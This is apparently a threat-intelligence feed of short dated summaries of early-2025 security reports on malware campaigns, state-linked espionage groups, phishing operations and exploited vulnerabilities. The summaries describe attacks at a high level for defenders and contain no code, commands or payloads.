The Wagmi traffer group, operating since early 2023, specializes in NFT scams and cryptocurrency theft. They utilize sophisticated social engineering tactics, fake web3-themed games, and impersonation of legitimate projects to lure victims. Their operations have allegedly earned over $2.4 million between June 2023 and March 2025. The group employs various techniques, including seed phrase phishing and automated wallet address scraping from social media. They target users of NFT marketplaces and the Web3 community, using fake job offers and enticing game promotions. The group also engages in code signing certificate abuse to bypass security measures and increase infection rates. Their malware payloads include HijackLoader, Lumma C2 infostealer, Rhadamanthys stealer, and AMOS stealer for macOS.
March 2025 Security Issues in Korean & Global Financial Sector
released on 2025-04-08 @ 07:32:51 AM
This analysis covers cyber threats and security issues in the financial industry, focusing on South Korea and global incidents. It examines malware and phishing cases, lists top malware strains, and provides statistics on leaked Korean accounts. The report delves into major financial threats on the dark web, including credit card data breaches, database leaks, and ransomware attacks. Notable cases involve the sale of 40 GB of credit card details from BidenCash, a data breach at a Swiss insurance company, a ransomware attack on a Sri Lankan bank, and the sale of SSH access credentials for a Canadian bankers association. These incidents highlight the need for enhanced security measures, comprehensive data management, and vigilance against evolving cyber threats in the financial sector.
PoisonSeed Campaign Targets CRM and Bulk Email Providers in Supply Chain Spam Operation
released on 2025-04-07 @ 08:16:44 PM
A new threat group, dubbed PoisonSeed, is targeting enterprise organizations and individuals outside the cryptocurrency industry. The campaign focuses on phishing CRM and bulk email providers' credentials to export email lists and send bulk spam. The attackers use a cryptocurrency seed phrase poisoning attack, providing security seed phrases to trick victims into compromising their wallets. Similarities have been detected between PoisonSeed, Scattered Spider, and CryptoChameleon, but the campaign is being classified separately due to unique characteristics. The attackers have set up phishing pages for prominent CRM and bulk email companies, including Mailchimp, SendGrid, Hubspot, Mailgun, and Zoho. Once credentials are phished, the process of bulk downloading email lists appears to be automated. The campaign also involves spam sent from compromised accounts, including a notable breach of an Akamai SendGrid account.
Vidar Stealer: Infostealer malware discovered in Steam game
released on 2025-04-07 @ 07:41:03 PM
A recent analysis uncovered a sophisticated deployment of Vidar Stealer, an infamous information-stealing malware, disguised as a legitimate Microsoft Sysinternals tool, BGInfo.exe. The malware, found with an expired Microsoft signature, was significantly larger than the original file and contained modified initialization routines. It creates virtual memory allocations to execute its malicious code, ultimately extracting and running Vidar Stealer. This variant maintains its core functionalities, including credential theft, cryptocurrency wallet targeting, session hijacking, and cloud data theft. The incident highlights the evolving tactics of cybercriminals, emphasizing the need for vigilant threat hunting and proactive security measures.
How ToddyCat tried to hide behind AV software
released on 2025-04-07 @ 12:54:42 PM
The ToddyCat APT group has developed a sophisticated tool called TCESB to stealthily execute payloads and evade detection. This tool exploits a vulnerability (CVE-2024-11859) in ESET Command line scanner for DLL proxying, using a modified version of the open-source EDRSandBlast malware. TCESB employs techniques like DLL proxying, kernel memory manipulation, and Bring Your Own Vulnerable Driver (BYOVD) to bypass security solutions. It searches for kernel structure addresses using CSV or PDB files, installs a vulnerable Dell driver, and decrypts AES-128 encrypted payloads. The discovery highlights the need for monitoring driver installations and Windows kernel debug symbol loading events to detect such sophisticated attacks.
Unveiling EncryptHub: Analysis of a multi-stage malware campaign
released on 2025-04-07 @ 10:37:24 AM
EncryptHub, an emerging cybercriminal entity, has been conducting multi-stage malware campaigns using trojanized applications and third-party distribution services. Their tactics include using PowerShell scripts for system data gathering, information exfiltration, and payload deployment. The threat actor prioritizes stolen credentials based on cryptocurrency ownership and corporate network affiliation. EncryptHub is developing a remote access tool called 'EncryptRAT' with plans for future distribution. Their evolving killchain involves multiple stages, including initial execution, data exfiltration, system information collection, and eventual deployment of the Rhadamanthys malware. Despite operational security mistakes, EncryptHub continues to refine their tactics, emphasizing the need for vigilant cybersecurity measures.
CrushFTP CVE-2025-31161 Auth Bypass and Post-Exploitation
released on 2025-04-05 @ 07:55:38 AM
A critical vulnerability (CVE-2025-31161) in CrushFTP managed file transfer software allows attackers to bypass authentication and gain admin-level access. Affecting versions 10.0.0-10.8.3 and 11.0.0-11.3.0, the flaw enables unauthorized actions, including data retrieval and administrative control. Exploitation has been observed since March 30, 2025, with ~1,500 vulnerable instances exposed. Post-exploitation activities include creating backdoor accounts, deploying MeshCentral agents, and using AnyDesk for remote access. A Telegram bot-based malware was also identified. The vulnerability stems from improper S3 authorization header processing and can be exploited with a simple HTTP request. Immediate patching to versions 11.3.1+ or 10.8.4+ is strongly recommended.
New Evasive Campaign Delivers LegionLoader via Fake CAPTCHA & CloudFlare Turnstile
released on 2025-04-05 @ 07:55:38 AM
A new malicious campaign has been discovered targeting users searching for PDF documents online. The attack uses fake CAPTCHAs and CloudFlare Turnstile to deliver LegionLoader malware, which then installs a malicious browser extension. The infection chain involves a drive-by download, execution of a VMware-signed application that sideloads a malicious DLL, and use of process hollowing to inject the LegionLoader payload. The browser extension, disguised as 'Save to Google Drive', is installed on Chrome, Edge, Brave and Opera browsers to steal sensitive user data and monitor Bitcoin activities. The campaign has affected over 140 customers, primarily in North America, Asia and Southern Europe, with technology and financial services sectors being the most targeted.
Grandoreiro Stealer Targeting Spain and Latin America: Malware Analysis and Decryption Insights
released on 2025-04-04 @ 07:54:34 PM
A new campaign utilizing the Brazilian stealer Grandoreiro has been detected targeting Spain and Latin American countries. The malware, active since 2017, aims to steal sensitive information, including banking credentials and personal data. It employs advanced evasion techniques such as string encryption and anti-sandbox measures. The campaign distributes Grandoreiro through phishing emails containing VBS files. Once executed, it performs various checks to evade detection and uses legitimate services for geolocation and DNS resolution. The report provides detailed insights into the malware's behavior and explains the string obfuscation and decryption techniques used in this campaign.
Where to Find Aspiring Hackers
released on 2025-04-04 @ 07:54:29 PM
This analysis focuses on Proton66, a bulletproof hosting network enabling cybercrime operations and serving as a hub for aspiring cybercriminals. It examines the activities of a threat actor known as 'Coquettte,' who is linked to the Horrid hacking group. The investigation reveals a fake cybersecurity website used for malware distribution, and explores Coquettte's broader criminal ventures, including a website allegedly providing guides for illegal activities. The research highlights Proton66's role as a breeding ground for amateur threat actors and provides insights into the malware infrastructure used by Coquettte, including the Rugmi/Penguish loader trojan. The analysis also uncovers connections to other domains and potential affiliations with a larger hacking collective.
Lotus Blossom espionage group targets multiple industries with different versions of Sagerunex and hacking tools
released on 2025-04-04 @ 07:54:26 PM
The Lotus Blossom espionage group has been conducting cyber espionage campaigns targeting government, manufacturing, telecommunications, and media sectors in the Philippines, Vietnam, Hong Kong, and Taiwan. The group employs various versions of the Sagerunex backdoor, including new variants that use cloud services like Dropbox, Twitter, and Zimbra for command and control. Lotus Blossom utilizes multiple hacking tools and techniques to maintain long-term persistence in compromised networks. The attacks involve multi-stage operations, including reconnaissance, lateral movement, and data exfiltration. The group has been active since at least 2012 and continues to evolve its tactics and malware to evade detection.
APT Targets South Korea with Deceptive PDF Lures
released on 2025-04-04 @ 02:10:35 PM
The Kimsuky APT group, also known as Black Banshee, has been actively targeting South Korean government entities using evolving tactics. Two distinct campaigns were uncovered, both utilizing government-themed PDF documents as lures. The infection chain begins with a phishing email containing a malicious LNK file attachment, which drops an obfuscated VBA script. This script then deploys additional files, including a PDF and a ZIP containing malicious components. The attacks involve sophisticated techniques such as Base64 encoding, obfuscation, and VM-aware evasion. The malware's functionalities include data exfiltration, cryptocurrency wallet theft, browser data extraction, keylogging, and establishing C2 communication. The campaigns demonstrate the group's continuous efforts to compromise South Korean targets using deceptive tactics and multi-stage malware.
Where to Find Aspiring Hackers
released on 2025-04-04 @ 02:10:33 PM
This analysis delves into Proton66, a bulletproof hosting network enabling cybercrime operations and serving as a hub for aspiring cybercriminals. It focuses on a threat actor known as 'Coquettte' and their ties to the Horrid hacking group, a loosely organized cybercriminal collective. The investigation reveals a fake cybersecurity website, cybersecureprotect[.]com, which exposed its malicious infrastructure due to an OPSEC failure. Coquettte's activities include distributing malware, keyloggers, and trojans through Proton66's infrastructure. The research also uncovers other projects operated by this actor, including a website hosting guides for illegal activities. The analysis provides technical details of Coquettte's malware infrastructure and explores Proton66's role as a breeding ground for amateur threat actors.
Russian-Speaking Threat Actor Abuses Cloudflare & Telegram in Phishing Campaign
released on 2025-04-04 @ 11:47:58 AM
A Russian-speaking threat actor has launched a new phishing campaign using Cloudflare-branded pages themed around DMCA takedown notices. The attack abuses the ms-search protocol to deliver malicious LNK files disguised as PDFs. Once executed, the malware communicates with a Telegram bot to report the victim's IP address before connecting to Pyramid C2 servers. The campaign leverages Cloudflare Pages and Workers services to host phishing pages, and uses an open directory to store malicious files. The infection chain includes PowerShell and Python scripts, with incremental changes in tactics to evade detection. The actors' infrastructure spans multiple domains and IP addresses, primarily using Cloudflare's network.
Silent Credit Card Thief Uncovered
released on 2025-04-04 @ 11:47:53 AM
A sophisticated credit card skimming campaign dubbed 'RolandSkimmer' has been discovered, targeting users in Bulgaria. The attack utilizes malicious browser extensions across Chrome, Edge, and Firefox, initiated through a deceptive LNK file. The malware employs obfuscated scripts to establish persistent access, harvesting and exfiltrating sensitive financial data. The attack workflow involves system reconnaissance, downloading additional malicious files, and injecting scripts into web pages. The threat actor uses unique identifiers to track victims and employs sophisticated techniques to evade detection. The campaign demonstrates the evolving nature of web-based credit card skimming threats, highlighting the need for enhanced security measures against LNK-based attacks and unverified browser extensions.
Typosquatted Go Packages Deliver Malware Loader Targeting Li...
released on 2025-04-04 @ 11:47:51 AM
A malicious campaign is targeting the Go ecosystem with typosquatted packages that install hidden loader malware on Linux and macOS systems. The threat actor has published at least seven packages impersonating popular Go libraries, using array-based string obfuscation to hide malicious commands. The packages download and execute remote scripts that install an ELF file named f0eee999, which exhibits minimal initial malicious behavior. The campaign specifically targets UNIX-like environments, placing developers at risk. Multiple domains and fallback infrastructure suggest a persistent and adaptable threat actor. Developers are advised to implement real-time scanning tools, code audits, and careful dependency management to mitigate the risk of supply chain compromises.
Deobfuscating APT28's HTA Trojan: A Deep Dive into VBE Techniques & Multi-Layer Obfuscation
released on 2025-04-04 @ 11:47:51 AM
This analysis delves into APT28's cyber espionage campaign targeting Central Asia and Kazakhstan diplomatic relations, focusing on their HTA Trojan. The malware employs advanced obfuscation techniques, including VBE (VBScript Encoded) and multi-layer obfuscation. The investigation uses x32dbg debugging to decode the obfuscated code, revealing a custom map algorithm for character deobfuscation. The process involves decoding strings using embedded characters from Windows vbscript.dll. The analysis identifies the use of Microsoft's Windows Script Encoder (screnc.exe) to create VBE files. By employing various deobfuscation techniques, including a Python script, the final malware sample is extracted and analyzed, showcasing APT28's evolving tactics in cyber espionage.
Suspected China-Nexus Threat Actor Actively Exploiting Critical Ivanti Connect Secure Vulnerability (CVE-2025-22457)
released on 2025-04-04 @ 07:07:52 AM
A critical security vulnerability, CVE-2025-22457, affecting Ivanti Connect Secure VPN appliances has been actively exploited since mid-March 2025. The vulnerability allows remote code execution through a buffer overflow. Two new malware families, TRAILBLAZE and BRUSHFIRE, have been deployed along with the previously known SPAWN ecosystem. The suspected China-nexus espionage actor UNC5221 is believed to be behind the attacks. Post-exploitation activities include the use of a shell script dropper, deployment of various malware components, and attempts to evade detection by modifying the Integrity Checker Tool. Organizations are urged to immediately patch their systems and monitor for suspicious activity.
Proactive ClickFix Threat Hunting with Hunt.io
released on 2025-04-04 @ 07:07:51 AM
ClickFix is a browser-based delivery technique that uses deceptive prompts and clipboard hijacking to trick users into executing malicious commands. Cybercriminals and advanced actors employ this method to deploy malware, primarily information stealers. The technique involves luring users with fake system alerts or CAPTCHA challenges, then silently staging payloads for execution. The article describes how Hunt.io's research team used custom queries to identify web infrastructure associated with ClickFix delivery, uncovering multiple live domains serving malicious content. Examples include a Bitcoin-themed domain posing as Cloudflare WAF to deliver Lumma and CryptBot malware, a page targeting Zoho Office Suite credentials, and a compromised website abusing PowerShell. The report emphasizes the growing traction of ClickFix as a low-friction method for malware delivery and credential harvesting.
PoisonSeed Campaign Targets CRM and Bulk Email Providers in Supply Chain Spam Operation
released on 2025-04-04 @ 07:07:50 AM
The PoisonSeed campaign is targeting enterprise organizations and individuals outside the cryptocurrency industry by phishing CRM and bulk email provider credentials. The attackers export email lists and send bulk spam from compromised accounts, primarily to support cryptocurrency spam operations. The campaign uses a novel cryptocurrency seed phrase poisoning attack, providing security seed phrases to trick victims into copying them into new cryptocurrency wallets for future compromise. While similarities exist with Scattered Spider and CryptoChameleon groups, PoisonSeed is currently classified separately due to unique characteristics. The campaign has targeted companies like Coinbase, Ledger, Mailchimp, SendGrid, Hubspot, Mailgun, and Zoho, using sophisticated phishing techniques and automated processes to quickly exploit compromised accounts.
Outlaw Linux Malware: Persistent, Unsophisticated, and Surprisingly Effective
released on 2025-04-03 @ 10:07:28 PM
OUTLAW is a persistent Linux malware that uses basic techniques like SSH brute-forcing, SSH key manipulation, and cron-based persistence to maintain a long-lasting botnet. Despite its lack of sophistication, it remains active by leveraging simple but impactful tactics. The malware deploys modified XMRig miners, uses IRC for command and control, and includes publicly available scripts for persistence and defense evasion. OUTLAW's infection chain spans nearly the entire MITRE ATT&CK framework, offering many detection opportunities. It propagates in a worm-like manner, using compromised hosts to launch further SSH brute-force attacks on local subnets, rapidly expanding the botnet.
Gootloader Returns: Malware Hidden in Google Ads for Legal Documents
released on 2025-04-03 @ 10:07:18 PM
The Gootloader malware campaign has evolved its tactics, now using Google Ads to target victims seeking legal templates. The threat actor advertises legal documents, primarily agreements, through compromised ad accounts. Users searching for templates are directed to a malicious website where they are prompted to enter their email address. They then receive an email with a link to download a seemingly legitimate document, which is actually a zipped .JS file containing malware. When executed, the malware creates a scheduled task and uses PowerShell to communicate with compromised WordPress blogs. The campaign demonstrates a shift in Gootloader's strategy, moving from poisoned search results to controlled infrastructure for malware delivery.
Stripe API Skimming Campaign: Additional Victims & Insights
released on 2025-04-03 @ 10:07:16 PM
A sophisticated web skimming campaign has been discovered, utilizing a legacy Stripe API to validate stolen payment details before exfiltration. The attack involves multiple stages, including malicious loader injection, decoding, and skimming. Jscrambler's research team identified 49 affected merchants and uncovered additional domains potentially involved in the campaign. The skimmers are tailored for each targeted site and exploit vulnerabilities in e-commerce platforms. The attackers employ minimal obfuscation and transmit stolen data without encryption. The campaign has been active since August 2024, primarily targeting WooCommerce and WordPress sites. To protect against such attacks, merchants are advised to implement real-time webpage monitoring and adopt hardened iframe implementations.
BeaverTail and Tropidoor Malware Distributed via Recruitment Emails
released on 2025-04-03 @ 10:07:15 PM
A sophisticated malware campaign has been uncovered, involving the distribution of BeaverTail and Tropidoor malware through fake recruitment emails. The attackers, suspected to be of North Korean origin, impersonated a developer community to lure victims into downloading malicious code. The campaign utilizes a downloader disguised as 'car.dll' and BeaverTail malware masquerading as 'tailwind.config.js'. BeaverTail functions as an infostealer and downloader, targeting web browsers and cryptocurrency wallets. Tropidoor, a backdoor malware, establishes communication with command and control servers, allowing remote execution of various commands. The attack methodology shares similarities with previous North Korean campaigns, including the use of techniques reminiscent of the Lazarus group's LightlessCan malware.
Threat actors leverage tax season to deploy tax-themed phishing campaigns
released on 2025-04-03 @ 05:19:24 PM
Microsoft has observed several phishing campaigns using tax-related themes to steal credentials and deploy malware as Tax Day approaches in the United States. These campaigns use redirection methods like URL shorteners and QR codes in malicious attachments, and abuse legitimate services to avoid detection. They lead to phishing pages delivered via the RaccoonO365 platform, remote access trojans like Remcos, and other malware such as Latrodectus, BruteRatel C4, AHKBot, and GuLoader. The campaigns target various sectors including engineering, IT, consulting, and accounting firms. Threat actors use social engineering techniques to mislead taxpayers into revealing sensitive information, making payments to fake services, or installing malicious payloads. Microsoft provides detailed mitigation and protection guidance to help users and organizations defend against these tax-centric threats.
BeaverTail and Tropidoor Malware Distributed via Recruitment Emails
released on 2025-04-03 @ 05:19:11 PM
An attack involving BeaverTail and Tropidoor malware was discovered, targeting victims through fake recruitment emails from a developer community. The attackers provided a BitBucket link containing malicious code, including BeaverTail disguised as 'tailwind.config.js' and a downloader called 'car.dll'. BeaverTail, known for information theft and downloading additional payloads, was found in South Korea. The downloader shares similarities with the Lazarus group's LightlessCan malware. BeaverTail steals credential information and cryptocurrency wallet data from web browsers, while Tropidoor acts as a backdoor, connecting to C&C servers and executing various commands. The attack is suspected to be carried out by North Korean threat actors, highlighting the need for caution when dealing with executable files from unknown sources.
Thunderstruck! Malicious ads for RVTools lead to ThunderShell payload
released on 2025-04-03 @ 05:18:56 PM
A security incident involving malicious sponsored ads distributing backdoored administrative tools was detected. Users searching for RVTools were served a tampered version containing ThunderShell, a PowerShell-based remote access tool. The malicious ads, appearing in Google search results, led to a site mimicking the legitimate RVTools download page. The trojanized file, when executed, installs RVTools but also deploys ThunderShell, allowing attackers to execute commands on compromised machines. Multiple ads from different verified advertisers were used to evade security controls. The campaign highlights the persistent threat of malvertising and the need for stronger ad screening processes and user awareness.
Amateur Hacker Leverages Bulletproof Hosting Server to Spread Malware
released on 2025-04-03 @ 05:18:54 PM
A novice cybercriminal, known as 'Coquettte', has been discovered using a Russian bulletproof hosting provider, Proton66, to distribute malware. The hacker's activities include deploying the Rugmi malware loader through a fake cybersecurity product website and selling guides for illegal substances and weapons. Coquettte is believed to be part of a loosely structured hacking collective called Horrid. The threat actor's infrastructure spans multiple domains and platforms, including GitHub, YouTube, and Last.fm. This network appears to serve as an incubator for aspiring cybercriminals, offering malware resources, hosting solutions, and a collaborative environment for underground hacking activities.
TookPS distributed under the guise of UltraViewer, AutoCAD, and Ableton
released on 2025-04-03 @ 03:03:55 PM
A malware campaign is distributing the TookPS downloader by impersonating popular software like UltraViewer, AutoCAD, SketchUp, Ableton, and Quicken. The malware establishes an SSH tunnel for remote access and deploys additional payloads like TeviRat and Lapmon backdoors. The attackers gain full system control through various methods. The campaign targets both individuals and organizations, using domains registered in early 2024. Users are advised to avoid downloading pirated software, while organizations should implement strict security policies and conduct regular awareness training.
Analysis of New Mobile Banking Malware
released on 2025-04-01 @ 09:23:35 PM
Salvador Stealer is a newly discovered Android malware that poses as a banking application to steal sensitive user information. It employs a multi-stage attack chain, utilizing a dropper APK to install the main payload. The malware incorporates a phishing website within the app to collect personal and banking data, including Aadhaar numbers, PAN card details, and net banking credentials. It exfiltrates stolen information in real-time to both a phishing server and a Telegram-based Command and Control server. Salvador Stealer also intercepts SMS messages to capture one-time passwords and banking verification codes, bypassing two-factor authentication. The malware demonstrates persistence mechanisms, automatically restarting itself if stopped and surviving device reboots. Analysis revealed exposed infrastructure, including an accessible admin panel, potentially linking the attacker to India.
Evolution of Sophisticated Phishing Tactics: The QR Code Phenomenon
released on 2025-04-01 @ 03:36:09 PM
Since late 2024, attackers have employed new tactics in phishing documents containing QR codes. These include concealing final phishing destinations using legitimate websites' redirection mechanisms and adopting Cloudflare Turnstile for user verification. Some phishing sites specifically target credentials of particular victims. QR code phishing, or quishing, embeds phishing URLs into QR codes, enticing recipients to scan them with smartphones. This bypasses traditional security measures and targets personal devices. Attackers use URL redirection, exploit open redirects, and incorporate human verification within redirects to evade detection. The phishing operations typically involve redirection, human verification, and credential harvesting. These evolving tactics challenge both security detection mechanisms and user awareness.
Qilin affiliates spear-phish MSP ScreenConnect admin, targeting customers downstream
released on 2025-04-01 @ 03:24:42 PM
In January 2025, a Managed Service Provider administrator was targeted by a sophisticated phishing attack impersonating a ScreenConnect authentication alert. The attackers, affiliated with Qilin ransomware and tracked as STAC4365, used an adversary-in-the-middle technique to bypass multi-factor authentication and gain access to the MSP's ScreenConnect environment. They deployed their own ScreenConnect instance across multiple customer networks, performed reconnaissance, collected and exfiltrated data, and ultimately deployed Qilin ransomware. This attack matches a pattern of similar incidents dating back to 2022, utilizing fake ScreenConnect domains and the evilginx framework to intercept credentials and session cookies. The attackers employed various tools for lateral movement and defense evasion, including PsExec, NetExec, and WinRM.
From Contagious to ClickFake Interview: Lazarus leveraging the ClickFix tactic
released on 2025-04-01 @ 02:59:30 PM
Lazarus, a North Korean state-sponsored threat actor, has launched a new campaign called ClickFake Interview targeting cryptocurrency job seekers. This campaign, an evolution of the previously documented Contagious Interview, uses fake job interview websites to deploy the GolangGhost backdoor on Windows and macOS systems. The infection chain leverages the ClickFix tactic, downloading and executing malicious payloads during the interview process. The campaign primarily targets centralized finance (CeFi) entities, aligning with Lazarus' focus on cryptocurrency-related targets. Notable changes include targeting non-technical roles and using ReactJS-based websites for the fake interviews. The malware provides remote control and data theft capabilities, including browser information exfiltration.
Campaigns Impersonate the CIA to Target Ukraine Sympathizers, Russian Citizens and Informants
released on 2025-04-01 @ 02:48:14 PM
Silent Push Threat Analysts have uncovered a sophisticated phishing campaign targeting individuals sympathetic to Ukraine's defense, Russian citizens, and potential informants. The operation, believed to be orchestrated by Russian Intelligence Services, employs four major phishing clusters impersonating the CIA, Russian Volunteer Corps, Legion Liberty, and Hochuzhit. These campaigns aim to collect personal information from victims through fake websites and forms. The threat actors utilize bulletproof hosting, domain spoofing, and Google Forms to lure targets into providing sensitive data. The campaign's persistence, long-term targeting of specific groups, and impersonation of official organizations without apparent financial motives strongly suggest state-sponsored involvement. Mitigation efforts include identifying and blocking associated domains and IPs.
The Shelby Strategy
released on 2025-04-01 @ 02:48:13 PM
The SHELBY malware family exploits GitHub for command-and-control operations, employing sophisticated techniques to evade detection. The malware consists of a loader (SHELBYLOADER) and a backdoor (SHELBYC2), both obfuscated using Obfuscar. SHELBYLOADER employs various sandbox detection methods and uses GitHub for initial registration and key retrieval. SHELBYC2 communicates with the attacker's infrastructure using the GitHub API, allowing for file uploads, downloads, and command execution. The campaign targets Iraqi telecommunications and potentially UAE airports, utilizing highly targeted phishing emails. Despite its sophistication, the malware's design has a critical flaw: anyone with the embedded Personal Access Token can control infected machines, exposing a significant security vulnerability.
Delivering Trojans Via ClickFix Captcha
released on 2025-04-01 @ 02:48:07 PM
A new social engineering technique exploiting ClickFix Captcha has emerged as an effective method for delivering various types of malware, including Quakbot. This technique deceives users and bypasses security measures by utilizing a seemingly harmless captcha. The process involves redirecting users to a ClickFix captcha that tricks them into executing a malicious command on their local machine. The command downloads and executes obfuscated PowerShell scripts, which then retrieve and deploy the actual malware payload. The attackers use sophisticated obfuscation techniques, including fake ZIP files and PHP-based droppers, to evade detection and analysis. This method's success lies in exploiting user trust in captchas and legitimate-looking websites, increasing the likelihood of unwitting malware execution.
TsarBot Trojan Hits 750+ Banking & Crypto Apps!
released on 2025-04-01 @ 02:48:06 PM
A newly discovered Android banking Trojan, TsarBot, targets over 750 applications globally, including banking, finance, cryptocurrency, and e-commerce apps. It spreads through phishing sites masquerading as legitimate financial platforms and is installed via a dropper disguised as Google Play Services. TsarBot employs overlay attacks to steal credentials, records and remotely controls screens, and uses a fake lock screen to capture device lock credentials. It communicates with its C&C server using WebSocket across multiple ports to receive commands, send stolen data, and execute on-device fraud. The malware's capabilities include screen recording, keylogging, and SMS interception. Evidence suggests the threat actor behind TsarBot is likely of Russian origin.
SVG Phishing Malware Being Distributed with Analysis Obstruction Feature
released on 2025-04-01 @ 02:48:03 PM
A sophisticated phishing malware using Scalable Vector Graphics (SVG) format has been identified. The malware embeds malicious scripts within SVG files, using Base64 encoding to bypass detection. It employs various techniques to obstruct analysis, including blocking automation tools, preventing specific keyboard shortcuts, disabling right-clicks, and detecting debugging attempts. The malware redirects users to a fake CAPTCHA page, which, when interacted with, leads to further malicious actions, potentially a phishing site impersonating Microsoft login pages. This evolving threat highlights the need for increased user vigilance, especially when dealing with SVG files from unknown sources.
Analysis of Konni RAT: Stealth, Persistence, and Anti-Analysis Techniques
released on 2025-04-01 @ 02:48:02 PM
Konni RAT, a sophisticated remote access Trojan targeting Windows systems, employs a multi-stage attack process using batch files, PowerShell scripts, and VBScript. It exploits Windows Explorer limitations, obfuscates file paths, dynamically generates URLs, and uses temporary files to erase activity traces. The malware efficiently exfiltrates critical data to remote servers and maintains persistence through registry modifications. Key tactics include exploiting file extension hiding, the 260-character limit in LNK files, and complex variables for detection evasion. Konni RAT's modular design and advanced strategies present substantial risks to system security, highlighting the need for robust cybersecurity measures and proactive defense strategies.
Remcos RAT Malware Disguised as Major Carrier's Waybill
released on 2025-04-01 @ 02:48:00 PM
A sophisticated malware campaign has been discovered, utilizing the Remcos RAT disguised as a shipping company waybill. The attack begins with an email containing an HTML script, which when executed, downloads a JavaScript file. This file creates and downloads several components, including a configuration file, an encoded Remcos binary, a legitimate AutoIt loader, and a malicious AutoIt script. The AutoIt script employs evasion techniques, establishes persistence, decrypts the Remcos binary, and executes shellcode. The shellcode injects Remcos into a legitimate process (RegSvcs.exe) using various API calls. The Remcos RAT, once active, can steal information and execute remote commands based on C2 instructions. The campaign demonstrates the evolving tactics of cybercriminals, emphasizing the need for caution when handling emails from unknown sources.
PhaaS actor uses DoH and DNS MX to dynamically distribute phishing
released on 2025-03-31 @ 07:56:09 PM
Infoblox discovered a phishing kit that creatively employs DNS mail exchange (MX) records to dynamically serve fake, tailored login pages, spoofing over 100 brands.
New HijackLoader Evasion Tactics
released on 2025-03-31 @ 07:05:18 PM
HijackLoader, a malware loader discovered in 2023, has evolved with new modules and evasion tactics. Recent updates include call stack spoofing to mask function call origins, virtual machine detection to identify analysis environments, and persistence establishment via scheduled tasks. The loader now implements anti-VM checks, mutex creation, custom injection paths, and additional modules for various functions. Notable changes include the addition of new blocklisted processes and modifications to module decryption methods. HijackLoader's modular nature and continuous updates suggest ongoing efforts to enhance its anti-detection capabilities and complicate analysis.
Analysis: SmokeLoader malware distribution
released on 2025-03-31 @ 07:05:17 PM
A malicious campaign targeting First Ukrainian International Bank has been observed using the Emmenhtal loader to distribute SmokeLoader malware. The infection chain begins with a deceptive email containing a 7z archive, which extracts to reveal a bait PDF and a shortcut file. The shortcut downloads additional files, leading to the execution of PowerShell and Mshta to retrieve the Emmenhtal loader. This loader, disguised as a modified Windows utility, deploys SmokeLoader while maintaining a stealthy execution flow. SmokeLoader, a modular malware, can download additional payloads, steal credentials, and execute remote commands. The campaign demonstrates the evolving tactics of financially motivated threat actors, leveraging LOLBAS techniques and commercial protection tools for obfuscation.
Operation HollowQuill: Russian R&D Networks Targeted via Decoy PDFs
released on 2025-03-31 @ 12:20:31 PM
Operation HollowQuill targets Russian research and defense networks, particularly the Baltic State Technical University, using weaponized decoy documents disguised as research invitations. The attack chain involves a malicious RAR file containing a .NET dropper, which deploys a Golang-based shellcode loader and a legitimate OneDrive application. The final payload is a Cobalt Strike beacon. The campaign focuses on academic institutions, military and defense industries, aerospace and missile technology, and government-oriented research entities within the Russian Federation. The threat actor employs sophisticated techniques, including anti-analysis measures, APC injection, and infrastructure rotation across multiple ASNs.
The Espionage Toolkit: A Closer Look at its Advanced Techniques
released on 2025-03-31 @ 11:23:36 AM
Earth Alux, a China-linked APT group, is actively conducting cyberespionage attacks against key sectors in the APAC and Latin American regions. The group exploits vulnerable services in exposed servers to gain initial access and deploys web shells like GODZILLA. Their primary backdoor, VARGEIT, is used alongside COBEACON for various stages of attack. Earth Alux employs advanced techniques such as DLL side-loading, anti-API hooking, and execution guardrails. They utilize tools like RAILLOAD and RAILSETTER for persistence and evasion. The group's capabilities include system information collection, file manipulation, command execution, and tool injection via mspaint processes. Earth Alux targets industries such as government, technology, logistics, and manufacturing, demonstrating a strategic focus on high-value information across different sectors.
Fake Zoom Ends in BlackSuit Ransomware
released on 2025-03-31 @ 05:40:35 AM
A malicious website mimicking Zoom led to the installation of a trojanized installer, initiating a multi-stage attack. The initial payload, d3f@ckloader, downloaded additional components, including SectopRAT. After nine days, the threat actor deployed Brute Ratel and Cobalt Strike beacons for lateral movement. They used various techniques for discovery and credential access, including LSASS memory dumping. The attacker employed QDoor for proxying RDP connections, facilitating data collection and exfiltration via the cloud service Bublup. The intrusion culminated in the deployment of BlackSuit ransomware across multiple systems using PsExec, with a total time to ransomware of 194 hours over nine days.
Pulling the Threads on the Phish of Troy Hunt
released on 2025-03-29 @ 07:24:42 PM
A sophisticated phishing attack targeted Troy Hunt, compromising his Mailchimp account. The analysis reveals connections to the Scattered Spider group through domain pivoting. Using Validin's DNS, host response, and registration data, dozens of related domain names were uncovered. The investigation exposed a fake Cloudflare turnstile and bogus registration details. Pivoting on various features led to the discovery of multiple related domains and IP addresses. The attack's tactics strongly resemble those of Scattered Spider, including the reuse of previously used domains. The findings demonstrate the power of Validin's databases for uncovering adversary infrastructure and strengthening threat intelligence.
A Deep Dive into Water Arsenal and Infrastructure
released on 2025-03-29 @ 10:29:54 AM
Water Gamayun, a suspected Russian threat actor, exploits the MSC EvilTwin zero-day vulnerability (CVE-2025-26633) to compromise systems and exfiltrate data. The group uses custom payloads like EncryptHub Stealer variants, SilentPrism and DarkWisp backdoors, as well as known malware like Stealc and Rhadamanthys. Their delivery methods include malicious provisioning packages, signed .msi files, and Windows MSC files. The attackers employ techniques such as LOLBins and encrypted communications to evade detection. Their infrastructure includes C&C servers for managing infected systems and exfiltrating data. The campaign highlights the group's adaptability and sophistication in cyber espionage operations.
Gamaredon campaign abuses LNK files to distribute Remcos backdoor
released on 2025-03-28 @ 03:56:38 PM
A campaign targeting users in Ukraine with malicious LNK files has been observed since November 2024. The files, using Russian words related to troop movements as lures, run a PowerShell downloader that contacts geo-fenced servers in Russia and Germany. The second-stage payload uses DLL side-loading to execute the Remcos backdoor. The activity is attributed to the Gamaredon threat actor group with medium confidence. The campaign uses the invasion of Ukraine as a theme in phishing attempts, distributing LNK files disguised as Office documents. The servers used are mostly hosted by GTHost and HyperHosting ISPs. The attack chain involves DLL side-loading to load the Remcos backdoor, which communicates with a C2 server on a specific port.
Apache Tomcat: CVE-2025-24813: Active Exploitation
released on 2025-03-28 @ 03:56:38 PM
